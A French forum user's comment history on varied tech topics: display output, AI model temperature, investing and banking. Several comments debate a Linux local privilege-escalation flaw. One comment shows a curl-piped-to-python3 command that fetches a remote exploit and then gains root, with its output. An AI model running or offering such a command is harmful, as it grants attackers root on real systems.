gUI a écrit 6578 commentaires

Ça m'a tout l'air d'être OK:

GRAPHICS CARDS
==============

  card1: Advanced Micro Devices, Inc. [AMD/ATI] Navi 31 [Radeon RX 7900 XT/7900 XTX/7900 GRE/7900M] (rev c8)
         Driver: amdgpu | VRAM: 24 GB | GPU:11% MEM:1113/24560MB 46°C 16.0W
    ├─ DP-1: connected ← BenQ BenQ LCD 24"
    ├─ HDMI-A-1: connected ← BenQ BenQ LCD 24"

Total: 1 GPU(s), 2 output(s) connected

CONNECTED DISPLAYS
==================

  DP-1         2560x1440+0+0           24"  60Hz  BenQ BenQ LCD        DisplayPort  S/N:65Nxxxxxxxx     [PRIMARY]
  HDMI-A-1     2560x1440+2560+0        24"  60Hz  BenQ BenQ LCD        HDMI         S/N:65Nxxxxxxxx    

Total: 2 display(s) connected

LAYOUT
======

  +-----------------------------------++-----------------------------------+
  |                                   ||                                   |
  |                                   ||                                   |
  |                                   ||                                   |
  |                                   ||                                   |
  |                                   ||                                   |
  |               DP-1*               ||              HDMI-A-1             |
  |                                   ||                                   |
  |                                   ||                                   |
  |                                   ||                                   |
  |                                   ||                                   |
  +-----------------------------------++-----------------------------------+

Pour info je suis également sous Wayland/KDE.

En théorie, la théorie et la pratique c'est pareil. En pratique c'est pas vrai.

Qui est aussi trivial à faire si tu as accès au compte utilisateur ?

Je veux bien que tu m'expliques comment cups par exemple peut keylogguer ce que tu tapes sous Firefox sans droits root.

J'essaie vraiment très fort mais pour l'instant je n'arrive toujours pas à changer d'avis.

Essaie plus fort. Ce sera mon dernier conseil.

En théorie, la théorie et la pratique c'est pareil. En pratique c'est pas vrai.

ça ne change rien car l'attaquant a déjà les informations importantes.

je voulais pas me je vais t'en donner une. dans tes explications j'ai vraiment l'impression que tu ne penses que aux fichiers. mais il y a plein d'autres trucs à choper.

par exemple une fois root, faire un keylogger c'est trivial. là c'est tes mots de passe qui peuvent fuiter.

EDIT : ah tiens j'en ai une autre rigolote :)

un jour le RAID va débouler chez toi à 6h du mat
- vous hébergez un site pédophile
- ah non
- oh si ! on l'a découvert en enquêtant sur la dernière attaque DDOS sur les sites gouvernementaux
- mais… mon ordi est mono-utilisateur !!!
- ah donc vous confirmez que c'est bien vous qui en êtes à l'origine ?

En théorie, la théorie et la pratique c'est pareil. En pratique c'est pas vrai.

Qu'il ne faut pas se poser la question de quelle est la surface d'attaque ?

Si, tu peux te les poser, alors poses-toi les. D'ailleurs je t'ai donnée des pistes (pour ne pas dire la réponse).

En théorie, la théorie et la pratique c'est pareil. En pratique c'est pas vrai.

Peux-tu me donner un cas concret ou cette faille permet de faire quelque chose d'utile pour un attaquant sur un système mono-utilisateur ?

Je ne veux pas te donner d'exemple parce que soit tu me ressors un "oui mais moi ça s'applique pas parce que blablabla" et je repars pour un tour, soit tu es convaincu mais la prochaine fois, avec une faille différente, il va encore falloir donner des exemples.

C'est pas un problème que tu arrives à imaginer ou pas. Il faut avoir confiance dans les attaquants pour y arriver à ta place.

Réfléchis juste à pourquoi il faut un mot de passe pour être root, pourquoi tu ne fais pas toute ta vie en root, pourquoi on crée des utilisateurs différents sur un même système (fais un wc -l /etc/passwd). Tous ces comptes ont maintenant accès à tout. L'isolation des process explose, mono-utilisateur ou pas.

sur un système mono-utilisateur ?

Dis-toi que ton ordi n'a rien de mono-utilisateur. Tu ne maîtrises pas 1% de ce qu'il fait. Ne pars surtout pas du principe qu'il n'existe pas de code malicieux actuellement dans ton ordi.

En théorie, la théorie et la pratique c'est pareil. En pratique c'est pas vrai.

Depuis quelques décennies on revoit invariablement le même schéma : différents acteurs se positionnent sur un nouveau créneau, tous sont à pure perte, et celui qui tient à la fin peut remonter ses prix et rafler la mise.

Ça, c'est la théorie.

La pratique c'est que beaucoup doutent qu'il y ait moyen un jour de récupérer la mise de l'IA, tellement celles-ci dépasse l'entendement.

On est loin du 118-218 (premier exemple qui me vient en tête), des bus Macron, ou même de Netflix. Les sommes sont de plusieurs ordres de grandeur au dessus.

En théorie, la théorie et la pratique c'est pareil. En pratique c'est pas vrai.

Il y a plusieurs moyens qui tous ont en commun de vider le cache de lecture pour reprendre le vrai su (qui n'a jamais été réellement touché, il est là l'exploit).

Notamment echo 3 >/proc/sys/vm/drop_caches

En théorie, la théorie et la pratique c'est pareil. En pratique c'est pas vrai.

C'est surtout ne pas avoir de titre de propriété d'entreprises quelles quelles soient. Prends de la dette d'État par exemple (les fameux fonds en Euro).

En théorie, la théorie et la pratique c'est pareil. En pratique c'est pas vrai.

Faut lire l'article !

En théorie, la théorie et la pratique c'est pareil. En pratique c'est pas vrai.

ce qui m'ennuie c'est que tu nous reproches un peu ton manque d'imagination et ton manque de connaissances sur le domaine.

la sécu c'est des couches, et là une couche importante saute. c'est tout ce qu'il y a à comprendre. le reste c'est les spécialistes, qui notent comme très critique cette faille.

En théorie, la théorie et la pratique c'est pareil. En pratique c'est pas vrai.

Ici au boulot j'ai une Ubuntu tout ce qu'il y a de standard, je suis le seul utilisateur, et pourtant j'ai 65 entrées dans /etc/passwd. C'est à se demander pourquoi tout ne tourne pas sous root !

En théorie, la théorie et la pratique c'est pareil. En pratique c'est pas vrai.

Ah mais là t'es peinard, il n'y a pas de piège… c'est annoncé comme dangereux ^^

En théorie, la théorie et la pratique c'est pareil. En pratique c'est pas vrai.

Si ta température est de zéro, le modèle devient déterministe.

Oui c'est ça, j'en parle un peu ici.

Avec une température de zéro le modèle répond toujours la même chose (mais forcément plus facile de prédire ce qu'il va dire la première fois).

Pour des modèles qui vont coder on tend à baisser la température (par rapport à des modèles de génération de poèmes par exemple), mais faut pas non plus mettre zéro, en gros il serait incapable de tenter des trucs et s'enfoncerait dans la première idée qui lui vient.

Tout un métier !

En théorie, la théorie et la pratique c'est pareil. En pratique c'est pas vrai.

Dans ce cas, une fois le script exécuté, tous les utilisateurs non privilégiés sur la machine peuvent lancer su et devenir root sans mot de passe tant que le socket est ouvert…

Attention le script fourni ne sert pas à détecter la faille, mais bien à l'activer. À n'utiliser donc que si l'on peut rebooter rapidement (ce qui remet le système à l'état normal).

En théorie, la théorie et la pratique c'est pareil. En pratique c'est pas vrai.

Un (ou plusieurs) serveurs chez un (ou plusieurs) hébergeurs FFDN ?

Idéalement il faudrait qu'il soit pas trop loin de chez toi pour profiter des avantages du vrai support humain, y compris le dimanche (mais bon, là faut doubler le nombre de bières offertes, c'est normal), mais sur Toulouse je peux te conseiller le sérieux de Tetaneutral par exemple.

En théorie, la théorie et la pratique c'est pareil. En pratique c'est pas vrai.

Cette faille permet, si je comprends bien de passer de l'utilisateur courant à root sans entrer de mot de passe.

Il faut bien être conscient que la séparation utilisateur/administrateur est la principale mesure de sécurité de ton système. Là oui, ça tombe.

Les vrais trucs que je veux protéger sont dans ma home (documents, photos, mails, etc.).

Donc lisible et écrivable par tous les comptes à partir de maintenant.

Quelle est la surface d’attaque ?

N'importe quel programme exécuté en tant que utilisateur peut choper les droits root. Ton Firefox par exemple, ou ton LibreOffice. C'est 10 lignes de script, ça marche partout. Le font-ils ? Je te laisse faire l'audit du code, mais perso je préfère avoir un kernel sans trou aussi béant, ça évite ce style de questionnement.

Un de mes enfants pourrait profiter d'une absence pour se créer un accès permanent à mon ordi ?

C'est surtout qu'il n'a pas intérêt à exécuter n'importe quoi. L'isolation "je leur fais un compte dédié pour éviter les emmerdes" saute immédiatement.

Par exemple un tuto qui contient le fameux curl | bash, vaut mieux y jeter un oeil avant, les hackeurs de sites Internet vont se ruer sur cette aubaine !

En théorie, la théorie et la pratique c'est pareil. En pratique c'est pas vrai.

Il existe une manière de faire propre ?

Heu… plus propre que de télécharger un script random et l'exécuter directement sans même le lire ? Sûrement oui !

En théorie, la théorie et la pratique c'est pareil. En pratique c'est pas vrai.

Sur Arch mise à jour il y a quelques jours (1 semaine ?) la faille marche :

$ curl https://copy.fail/exp | python3 && su
# id
uid=0(root) gid=1002(user) groups=1002(user)

En théorie, la théorie et la pratique c'est pareil. En pratique c'est pas vrai.

Pour se rendre compte de ce que c'est que l'orbite basse, j'aime beaucoup cette animation SVG à l'échelle sur Wikimedia.

C'est vraiment juste au dessus de nos tête, rien à voir avec les satellites comme le GPS.

Et donc apparemment c'est un sacré embouteillage, le carambolage va faire mal !

En théorie, la théorie et la pratique c'est pareil. En pratique c'est pas vrai.

qui ne laissent pas de place à l'ambiguïté

Et même là… la complexité des logiciels fait que finalement ça le devient ambigu. Sinon on ne testerait pas, on serait sûrs de nous.

Le déterminisme aussi ce n'est pas vraiment le cas avec les logiciels, sinon on ne parlerait pas de "race condition" ou de "spurious bugs".

Et si c'est pour dire "mais au moins avec un langage algorithmique on peut tout retracer", pas de soucis, avec une IA aussi, ça reste un logiciel fait avec des instructions non ambiguës, c'est fait via ton même langage algorithmique.

Alors oui l'IA rajoute sa couche d'imprévisibilité (et c'est peu de le dire), mais par contre on peut très bien faire des choses reproductibles avec (j'y travaille pour mes tests auto). Je donne à ministral (en local via Ollama) un screenshot, je lui demande un truc mou comme "décrit l'image". Évidemment j'ai aucune idée de ce qu'il va me pondre. Mais si je mets une temperature à 0, je sais que je peux lui demander 10x, il me répondra 10x exactement la même chose, et derrière je peux vérifier formellement le contenu attendu.

Donc évidemment, le code informatique est une manière plus formelle, plus prédictible et plus reproductible, c'est évident, mais ça ne fait pas tout.

Dans un avion qui pourrait voler 100% en autonomie depuis des décennies (toutes les phases sont automatisables), on continue de mettre un pilote, pourtant non déterministe, imprévisible dans une certaine mesure, justement pour gérer l'imprévisible des calculateurs programmés formellement (et pourtant, on a testé, croyez moi !!!). Peut-être qu'un jour il y aura une IA à la place, pour (tenter de) rattraper les bugs non prévus des calculateurs parfaitement déterministes ?

En théorie, la théorie et la pratique c'est pareil. En pratique c'est pas vrai.

Elles trainaient sur un coin de table et il s'est servi tout seul.

Oui c'est un comportement de l'IA qui est d'ailleurs souvent décrit, et que personnellement j'observe régulièrement. Pour arriver à ses fins, tout ce qui n'est pas explicitement interdit est autorisé.

Il y a beaucoup de non dits dans les relations humaines, et ces foutus IA qui parlent vraiment très bien ont tendance à ce qu'on se comporte comme si on avait un humain en face. Or non, il faut tout expliciter, et on n'est clairement pas habitués à ça.

Et moi le premier, c'est limite si je ne dis pas "bonjour" et "merci". Mais maintenant je me force à lui parler comme à une machine, afin justement de modeler mon cerveau sur le fait que c'est bien une machine en face.

En théorie, la théorie et la pratique c'est pareil. En pratique c'est pas vrai.

Oui de manière générale le travail des autres est assez facile. Alors que le mien, vous ne vous rendez pas compte à quel point il est compliqué.

En théorie, la théorie et la pratique c'est pareil. En pratique c'est pas vrai.

quand on tape un numéro IBAN avec un nom erroné dans la page ou l'app pour faire un virement bancaire, la banque demande si on veut pas plutôt mettre le nom associé avec le compte à la place

Idem en France avec le Crédit Mutuel (au moins). Perso je trouve ça plutôt sain : quand j'envoie de l'argent, la banque veut s'assurer que je sais à qui je l'envoie (c'est la première barrière contre des fraudes style "pour régulariser votre compte Amélie veuillez envoyer 25€ à l'IBAN blablabla".

En théorie, la théorie et la pratique c'est pareil. En pratique c'est pas vrai.

Mais c'est pas du tout de la triche ! Merci pour ces chiffres.

Je ferai l'essai sur une Xubuntu et une Lubuntu tiens pour voir si on se rapproche de ce chiffre.

En théorie, la théorie et la pratique c'est pareil. En pratique c'est pas vrai.

Bon, tu l'avais deviné, évidemment que les 80€ tu les aurais même pas eu.

Mais il y a eu des précédents : https://www.minimachines.net/actu/faux-avis-amazon-a-ferme-600-marques-et-3000-boutiques-102308

En théorie, la théorie et la pratique c'est pareil. En pratique c'est pas vrai.